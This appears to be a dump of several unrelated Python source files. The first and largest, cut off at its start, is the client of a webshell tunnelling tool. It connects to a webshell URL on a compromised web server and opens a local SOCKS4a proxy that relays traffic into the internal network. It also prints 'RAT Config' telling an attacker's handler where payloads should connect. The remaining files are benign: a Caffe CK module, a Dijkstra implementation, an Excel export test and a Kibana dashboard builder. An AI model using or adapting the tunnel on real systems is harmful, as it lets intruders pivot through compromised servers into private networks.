wait = return_data.get(WAIT_TIME)
time.sleep(wait)
def setc_webshell(self, WEBSHELL):
try:
r = requests.get(WEBSHELL, verify=False, timeout=3, headers=self.headers, proxies=self.proxy)
if b"UTF-8" in r.content:
self.WEBSHELL = WEBSHELL
return True
else:
return False
except requests.exceptions.ProxyError as proxyError:
self.logger.error("Connet to proxy failed : {}".format(self.proxy))
return False
except Exception as E:
self.logger.exception(E)
return False
def setc_remoteserver(self, remote_server=None):
if remote_server is None:
for port in CONTROL_PORT:
for i in range(2):
self.REMOTE_SERVER = "http://{}:{}".format(LOCALADDR, port)
result = self._post_data(URL_CHECK)
                    if result is None:  # roll back on failure
self.REMOTE_SERVER = None
continue
else:
return result
return None
self.REMOTE_SERVER = remote_server
result = self._post_data(URL_CHECK)
        if result is None:  # roll back on failure
self.REMOTE_SERVER = None
return result
def setc_localaddr(self, ip, port):
if port_is_used(port, ip):
return False
else:
self.LOCAL_ADDR = "{}:{}".format(ip, port)
return True
def sets_config(self, tag, data):
payload = {CONFIG_TAG: tag, CONFIG_DATA: data}
web_return_data = self._post_data(URL_SET_CONFIG, payload)
return web_return_data
def send_cmd(self, tag, data=None):
payload = {CONFIG_TAG: tag, CONFIG_DATA: data}
web_return_data = self._post_data(URL_CMD, payload)
return web_return_data
class ClientRequest(object):
'''Represents a client SOCKS4 request'''
def __init__(self, data):
'''Construct a new ClientRequeset from the given raw SOCKS request'''
self.invalid = False
# Client requests must be at least 9 bytes to hold all necessary data
if len(data) < 9:
self.invalid = True
return
# Version number (VN)
self.parse_vn(data)
# SOCKS command code (CD)
self.parse_cd(data)
# Destination port
self.parse_dst_port(data)
# Destination IP / Domain name (if specified)
self.parse_ip(data)
# Userid
self.parse_userid(data)
@classmethod
def parse_fixed(cls, data):
'''Parse and return the fixed-length part of a SOCKS request
Returns a tuple containing (vn, cd, dst_port, dst_ip) given the raw
socks request
'''
return struct.unpack('>BBHL', data[:8])
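    # Illustrative parse (hedged): for a SOCKS4 CONNECT request to 1.2.3.4:80,
    #   data = b'\x04\x01\x00\x50\x01\x02\x03\x04' + b'user\x00'
    #   ClientRequest.parse_fixed(data)  ->  (4, 1, 80, 16909060)
    # i.e. version 4, command CONNECT, destination port 80, packed IPv4 address.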
def parse_vn(self, data):
'''Parse and store the version number given the raw SOCKS request'''
vn, _, _, _ = ClientRequest.parse_fixed(data)
if (vn != CLIENT_VN):
self.invalid = True
def parse_dst_port(self, data):
'''Parse and store the destination port given the raw SOCKS request'''
_, _, dst_port, _ = ClientRequest.parse_fixed(data)
self.dst_port = dst_port
def parse_cd(self, data):
'''Parse and store the request code given the raw SOCKS request'''
_, cd, _, _ = ClientRequest.parse_fixed(data)
if (cd == REQUEST_CD_CONNECT or cd == REQUEST_CD_BIND):
self.cd = cd
else:
self.invalid = True
def parse_ip(self, data):
'''Parse and store the destination ip given the raw SOCKS request
If the IP is of the form 0.0.0.(1-255), attempt to resolve the domain
name specified, then store the resolved ip as the destination ip.
'''
_, _, _, dst_ip = ClientRequest.parse_fixed(data)
ip = ipaddr.IPv4Address(dst_ip)
o1, o2, o3, o4 = ip.packed
# Invalid ip address specifying that we must resolve the domain
# specified in data (As specified in SOCKS4a)
if (o1, o2, o3) == (0, 0, 0) and o4 != 0:
try:
# Variable length part of the request containing the userid
# and domain (8th byte onwards)
userid_and_domain = data[8:]
# Extract the domain to resolve
_, domain, _ = userid_and_domain.split(b'\x00')
except ValueError:
# Error parsing request
self.invalid = True
return
try:
resolved_ip = socket.gethostbyname(domain)
except socket.gaierror:
# Domain name not found
self.invalid = True
return
self.dst_ip = resolved_ip
else:
self.dst_ip = ip.exploded
def parse_userid(self, data):
'''Parse and store the userid given the raw SOCKS request'''
try:
index = data.index(b'\x00')
self.userid = data[8:index]
except ValueError:
self.invalid = True
except IndexError:
self.invalid = True
def isInvalid(self):
'''Returns true if this request is invalid, false otherwise'''
return self.invalid
class Socks4aProxy(threading.Thread):
'''A SOCKS4a Proxy'''
def __init__(self, host="127.0.0.1", port=-1, timeout=0.05, bufsize=BUFSIZE):
'''Create a new SOCKS4 proxy on the specified port'''
self._host = host
self._port = port
self._bufsize = bufsize
self._backlog = BACKLOG
self._timeout = timeout
self.logger = logging.getLogger("StreamLogger")
threading.Thread.__init__(self)
@staticmethod
def build_socks_reply(cd, dst_port=0x0000, dst_ip='0.0.0.0'):
'''
Build a SOCKS4 reply with the specified reply code, destination port and
destination ip.
'''
# dst_ip_bytes = ipaddress.IPv4Address(dst_ip).packed
dst_ip_bytes = ipaddr.IPv4Address(dst_ip).packed
dst_ip_raw, = struct.unpack('>L', dst_ip_bytes)
return struct.pack('>BBHL', SERVER_VN, cd, dst_port, dst_ip_raw)
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._host, self._port))
s.listen(self._backlog)
self.logger.warning("socks4a server start on {}:{}".format(self._host, self._port))
except Exception as E:
self.logger.exception(E)
self.logger.error(
"start socks4a server failed on {}:{}, maybe port is using by other process".format(self._host,
self._port))
return False
self.logger.warning("Socks4a ready to accept")
while True:
try:
conn, addr = s.accept()
conn.settimeout(self._timeout)
data = conn.recv(self._bufsize)
# Got a connection, handle it with process_request()
self._process_request(data, conn, addr)
self.logger.info("Socks4a process_request finish")
except KeyboardInterrupt as ki:
self.logger.warning('Caught KeyboardInterrupt, exiting')
s.close()
sys.exit(0)
except Exception as E:
self.logger.exception(E)
try:
conn.close()
except Exception as E:
pass
def _process_request(self, data, client_conn, addr):
'''Process a general SOCKS request'''
client_request = ClientRequest(data)
# Handle invalid requests
if client_request.isInvalid():
client_conn.send(self.build_socks_reply(RESPONSE_CD_REQUEST_REJECTED))
client_conn.close()
return
if client_request.cd == REQUEST_CD_CONNECT:
globalClientCenter.logger.warning('Got connection from {}'.format(addr))
key = "{}:{}".format(addr[0], addr[1])
globalClientCenter.CACHE_CONNS[key] = {
"conn": client_conn,
"targetaddr": (client_request.dst_ip, client_request.dst_port),
"new": True, # 新的连接,第一次检查略过
}
client_conn.settimeout(self._timeout)
            client_conn.send(self.build_socks_reply(RESPONSE_CD_REQUEST_GRANTED))  # handshake done, start relaying
else:
self.logger.warning("Socks4a do not support bind request")
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Make sure the stinger_server is running on webserver "
"(stinger_server will listen 127.0.0.1:60010 127.0.0.1:60020)")
parser.add_argument('-w', '--webshell', metavar='http://192.168.3.10:8080/proxy.jsp',
help="webshell url",
required=True)
parser.add_argument('--header', metavar='Authorization: XXX,Cookie: XXX',
help="custom http request header",
default=None)
parser.add_argument('--proxy', metavar='socks5://127.0.0.1:1080',
help="Connect webshell through proxy",
default=None)
parser.add_argument('-l', '--locallistenaddress', metavar='127.0.0.1/0.0.0.0',
help="local listen address for socks4",
default='127.0.0.1')
parser.add_argument('-p', '--locallistenport',
default=10800,
metavar='N',
type=int,
help="local listen port for socks4",
)
parser.add_argument('-st', '--sockettimeout', default=0.2,
metavar="N",
type=float,
help="socket timeout value,the biger the timeout, the slower the transmission speed",
)
parser.add_argument('-ti', '--targetipaddress', metavar='127.0.0.1',
help="reverse proxy target ipaddress",
required=False)
parser.add_argument('-tp', '--targetport', metavar='60020',
help="reverse proxy target port",
required=False)
parser.add_argument('-c', '--cleansockst', default=False,
nargs='?',
metavar="true",
type=bool,
help="clean server exist socket(this will kill other client connect)",
)
parser.add_argument('-sm', '--singlemode', default=False,
nargs='?',
metavar="true",
type=bool,
help="clean server exist socket(this will kill other client connect)",
)
args = parser.parse_args()
WEBSHELL = args.webshell
LISTEN_ADDR = args.locallistenaddress
LISTEN_PORT = args.locallistenport
CLEAN_SOCKET = args.cleansockst
if CLEAN_SOCKET is not False:
CLEAN_SOCKET = True
else:
CLEAN_SOCKET = False
    # handle the header argument
globalClientCenter = ClientCenter()
header = args.header
if header is not None:
flag = globalClientCenter.custom_header(header)
if flag is not True:
sys.exit(1)
    # handle the proxy argument
proxy = args.proxy
if proxy is not None:
flag = globalClientCenter.custom_proxy(proxy)
if flag is not True:
sys.exit(1)
    # handle the singlemode argument
SINGLE_MODE = args.singlemode
if SINGLE_MODE is not False:
SINGLE_MODE = True
globalClientCenter.SINGLE_MODE = SINGLE_MODE
globalClientCenter.logger.info("SINGLE_MODE : {}".format(SINGLE_MODE))
else:
SINGLE_MODE = False
    # local port check
globalClientCenter.logger.info("------------------- Local check -------------------")
flag = globalClientCenter.setc_localaddr(LISTEN_ADDR, LISTEN_PORT)
if flag:
globalClientCenter.logger.info("Local listen check : pass")
else:
globalClientCenter.logger.error(
"Local listen check failed, please check if {}:{} is available".format(LISTEN_ADDR, LISTEN_PORT))
globalClientCenter.logger.error(WEBSHELL)
sys.exit(1)
    # check whether the webshell is reachable
webshell_alive = globalClientCenter.setc_webshell(WEBSHELL)
if webshell_alive:
globalClientCenter.logger.info("WEBSHELL check : pass")
globalClientCenter.logger.info("WEBSHELL: {}".format(WEBSHELL))
else:
globalClientCenter.logger.error("WEBSHELL check failed!")
globalClientCenter.logger.error(WEBSHELL)
sys.exit(1)
    # check whether stinger_server is reachable
result = globalClientCenter.setc_remoteserver()
if result is None:
globalClientCenter.logger.error("Read REMOTE_SERVER failed,please check whether server is running")
sys.exit(1)
else:
MIRROR_LISTEN = "127.0.0.1:60020"
globalClientCenter.logger.info("REMOTE_SERVER check : pass")
globalClientCenter.logger.info("\n")
globalClientCenter.logger.info("------------------- Get Sever Config -------------------")
for key in result:
globalClientCenter.logger.info("{} : {}".format(key, result.get(key)))
if key == "MIRROR_LISTEN":
MIRROR_LISTEN = result.get(key)
globalClientCenter.logger.info("\n")
globalClientCenter.logger.info("------------------- Set Server Config -------------------")
    # whether to clean up existing server-side connections
if CLEAN_SOCKET:
flag = globalClientCenter.send_cmd("CLEAN_SOCKET")
globalClientCenter.logger.info("CLEAN_SOCKET cmd : {}".format(flag))
    # timeout for the server to establish intranet TCP connections
sockettimeout = args.sockettimeout
if sockettimeout != DEFAULT_SOCKET_TIMEOUT:
flag = globalClientCenter.sets_config("SOCKET_TIMEOUT", sockettimeout)
globalClientCenter.logger.info("Set server SOCKET_TIMEOUT => {}".format(flag))
globalClientCenter.SOCKET_TIMEOUT = sockettimeout
globalClientCenter.logger.info("\n")
    # local target address for the reverse mapping
TARGET_IP = args.targetipaddress
if TARGET_IP is None:
globalClientCenter.TARGET_IP = MIRROR_LISTEN.split(":")[0]
else:
globalClientCenter.TARGET_IP = TARGET_IP
    # local target port for the reverse mapping
TARGET_PORT = args.targetport
if TARGET_PORT is None:
globalClientCenter.TARGET_PORT = int(MIRROR_LISTEN.split(":")[1])
else:
globalClientCenter.TARGET_PORT = int(TARGET_PORT)
globalClientCenter.logger.info("------------------! RAT Config !------------------")
globalClientCenter.logger.info("Socks4a on {}:{}".format(LISTEN_ADDR, LISTEN_PORT))
globalClientCenter.logger.info(
"Handler/LISTENER should listen on {}:{}".format(globalClientCenter.TARGET_IP, globalClientCenter.TARGET_PORT))
globalClientCenter.logger.info(
"Payload should connect to {}".format(MIRROR_LISTEN))
globalClientCenter.logger.info("------------------! RAT Config !------------------\n")
    # set the threads as daemon threads
globalClientCenter.setDaemon(True)
t2 = Socks4aProxy(host=args.locallistenaddress, port=args.locallistenport, timeout=sockettimeout)
t2.setDaemon(True)
    # start the services
globalClientCenter.start()
t2.start()
    # keep the program running and handle exit signals
while True:
try:
time.sleep(10)
except KeyboardInterrupt as ki:
print('Caught KeyboardInterrupt, exiting')
sys.exit(1)
|
module/caffe/module.py | dividiti/ck-caffe | 212 | 12776667 | #
# Collective Knowledge (caffe CK front-end)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: cTuning foundation, <EMAIL>, http://cTuning.org
#
cfg={} # Will be updated by CK (meta description of this module)
work={} # Will be updated by CK (temporal data)
ck=None # Will be updated by CK (initialized CK kernel)
# Local settings
##############################################################################
# Initialize module
def init(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
return {'return':0}
##############################################################################
# crowd-benchmark caffe
def crowdbench(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
i['action']='crowdsource'
i['module_uoa']=cfg['module_deps']['experiment.bench.caffe']
return ck.access(i)
##############################################################################
# TBD: classification demo using webcam + benchmarking/tuning via CK
def demo(i):
"""
Input: {
(camera_id) - camera ID
(delay) - delay
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Deps
import time
import cv2
import os
# Prepare tmp entry if doesn't exist
duoa=cfg['demo']['data_uoa']
image_name=cfg['demo']['image_name']
r=ck.access({'action':'load',
'module_uoa':cfg['module_deps']['tmp'],
'data_uoa':duoa})
if r['return']>0:
if r['return']!=16: return r
r=ck.access({'action':'add',
'module_uoa':cfg['module_deps']['tmp'],
'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
pf=os.path.join(p, image_name)
# Initialize web cam
ci=int(i.get('camera_id',0))
dl=int(i.get('delay',1))
wcam = cv2.VideoCapture(ci)
# Permanent loop
while True:
ck.out('Obtaining picture from webcam ...')
s, img = wcam.read()
if s: # frame captured without any errors
# cv2.namedWindow("cam-test")
# cv2.imshow("cam-test",img)
# destroyWindow("cam-test")
cv2.imwrite(pf,img)
time.sleep(dl)
return {'return':0}
##############################################################################
# autotune Caffe workloads
def autotune(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
i['module_uoa']=cfg['module_deps']['program']
i['data_uoa']='caffe'
i['explore']='yes'
i['extra_tags']='dnn'
i['skip_collaborative']='yes'
i['skip_pruning']='yes'
i['iterations']=-1
i['new']='yes'
i['cmd_keys']=['time_cpu','time_gpu']
return ck.access(i)
|
Dijkstra's_Shortest_Path/Python/paveldedik/dijkstra.py | Mynogs/Algorithm-Implementations | 1,184 | 12776686 | <reponame>Mynogs/Algorithm-Implementations
def initialize(G, s):
"""Initialize graph G and vertex s."""
V, E = G
d = {v: float('inf') for v in V}
p = {v: None for v in V}
d[s] = 0
return d, p
def dijkstra(G, w, s):
"""Dijkstra's algorithm for shortest-path search."""
d, p = initialize(G, s)
V, E = G
S = set(V)
while S:
u = min(S, key=lambda x: d[x])
S = S - {u}
for (t, v) in E:
if t == u and d[v] > d[u] + w[u, v]:
d[v] = d[u] + w[u, v]
p[v] = u
return d, p # return distances and a tree representing shortest paths
if __name__ == '__main__':
V = ['A', 'B', 'C', 'D'] # vertexes
E = [('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')] # edges
w = {('A', 'B'): 1, ('B', 'C'): 3, ('B', 'D'): 1,
('C', 'D'): 8, ('D', 'B'): 2} # weights
    print(dijkstra((V, E), w, 'A'))
|
tests/test_excel.py | hacklabr/django-rest-pandas | 1,097 | 12776688 | <gh_stars>1000+
from rest_framework.test import APITestCase
from tests.testapp.models import TimeSeries
from wq.io import load_file
class ExcelTestCase(APITestCase):
def setUp(self):
data = (
('2014-01-01', 0.5),
('2014-01-02', 0.4),
('2014-01-03', 0.6),
('2014-01-04', 0.2),
('2014-01-05', 0.1),
)
for date, value in data:
TimeSeries.objects.create(date=date, value=value)
def test_xls(self):
response = self.client.get("/timeseries.xls")
self.assertEqual(
'attachment; filename="Time Series.xls"',
response['content-disposition'],
)
xlfile = open('tests/output.xls', 'wb')
xlfile.write(response.content)
xlfile.close()
data = load_file("tests/output.xls")
self.assertEqual(len(data), 5)
self.assertEqual(data[0].date.year, 2014)
self.assertEqual(data[0].value, 0.5)
def test_xlsx(self):
response = self.client.get("/timeseries.xlsx")
self.assertEqual(
'attachment; filename="Time Series.xlsx"',
response['content-disposition'],
)
xlfile = open('tests/output.xlsx', 'wb')
xlfile.write(response.content)
xlfile.close()
data = load_file("tests/output.xlsx")
self.assertEqual(len(data), 5)
self.assertEqual(data[0].date.year, 2014)
self.assertEqual(data[0].value, 0.5)
|
dsio/dashboard/kibana.py | ufoioio/datastream.io | 897 | 12776692 | <filename>dsio/dashboard/kibana.py<gh_stars>100-1000
import elasticsearch
from kibana_dashboard_api import Visualization, Dashboard
from kibana_dashboard_api import VisualizationsManager, DashboardsManager
from ..exceptions import KibanaConfigNotFoundError
def generate_dashboard(es_conn, sensor_names, index_name, timefield='time',
update=True):
""" Generate a Kibana dashboard given a list of sensor names """
es_conn.index(index='.kibana', doc_type="index-pattern",
id=index_name,
body={
"title": index_name,
"timeFieldName": "time"
})
dashboards = DashboardsManager(es_conn)
dashboard = Dashboard()
dashboard.id = "%s-dashboard" % index_name
dashboard.title = "%s dashboard" % index_name
dashboard.panels = []
dashboard.options = {"darkTheme": True}
dashboard.time_from = "now-15m"
dashboard.refresh_interval_value = 5000
dashboard.search_source = {
"filter": [{
"query": {
"query_string": {
"analyze_wildcard": True,
"query": "*"
}
}
}]
}
visualizations = VisualizationsManager(es_conn)
vis_list = visualizations.get_all() # list all visualizations
panels = []
i = 0
for sensor in sensor_names:
viz_id = "%s-%s" % (index_name, sensor)
# Check if visualization exists
viz = next((v for v in vis_list if v.id == viz_id), None)
if not viz: # If not, create it
viz = Visualization()
viz.id = viz_id
viz.title = "%s-%s" % (index_name, sensor)
viz.search_source = {
"index": index_name,
"query":{
"query_string":{
"analyze_wildcard": True,
"query":"*"
}
},
"filter":[]
}
viz.vis_state = {
"title": "%s-%s" % (index_name, sensor),
"type": "line",
"params": {
"addLegend": True,
"addTimeMarker": True,
"addTooltip": True,
"defaultYExtents": True,
"drawLinesBetweenPoints": True,
"interpolate": "linear",
"radiusRatio": 9,
"scale": "linear",
"setYExtents": False,
"shareYAxis": True,
"showCircles": True,
"smoothLines": True,
"times":[],
"yAxis":{}
},
"aggs": [
{
"id": "1",
"type": "avg",
"schema":"metric",
"params": {
"field": sensor,
"customLabel": sensor.replace('_', ' ')
}
}, {
"id": "2",
"type": "max",
"schema":"radius",
"params": {
"field":"SCORE_%s" % sensor
}
}, {
"id": "3",
"type": "date_histogram",
"schema": "segment",
"params":{
"field": timefield,
"interval": "custom",
"customInterval": "5s",
"min_doc_count": 1,
"extended_bounds": {}
}
}
],
"listeners": {}
}
try:
res = visualizations.add(viz)
assert res['_id'] == viz_id
except elasticsearch.exceptions.ConflictError:
if update:
res = visualizations.update(viz)
panel = {
"id": viz_id,
"panelIndex": i,
"row": i,
"col": i,
"size_x": 7,
"size_y": 4,
"type": "visualization"
}
panels.append(panel)
ret = dashboard.add_visualization(viz)
i += 1
# Create the index if it does not exist
if not es_conn.indices.exists(index_name):
index_properties = {"time" : {"type": "date"}}
body = {"mappings": {index_name: {"properties": index_properties}}}
es_conn.indices.create(index=index_name, body=body)
try:
ret = dashboards.add(dashboard)
except elasticsearch.exceptions.ConflictError:
# Dashboard already exists, let's update it if we have to
if update:
ret = dashboards.update(dashboard)
# Create the index pattern
es_conn.index(index='.kibana', doc_type="index-pattern", id=index_name,
body={"title": index_name, "timeFieldName": "time"})
# Search for kibana config
kibana_config = es_conn.search(index='.kibana',
sort={'_uid': {'order': 'desc'}},
doc_type='config')
try:
kibana_id = kibana_config['hits']['hits'][0]['_id']
except:
raise KibanaConfigNotFoundError()
es_conn.update(index='.kibana', doc_type='config', id=kibana_id,
body={"doc": {"defaultIndex" : index_name}})
return ret
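# Usage sketch (hedged; the Elasticsearch host, index name and sensor names below
# are assumptions for illustration):
#
#   from elasticsearch import Elasticsearch
#   es = Elasticsearch(['http://localhost:9200'])
#   generate_dashboard(es, ['temperature', 'pressure'], 'my_sensors', timefield='time')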
|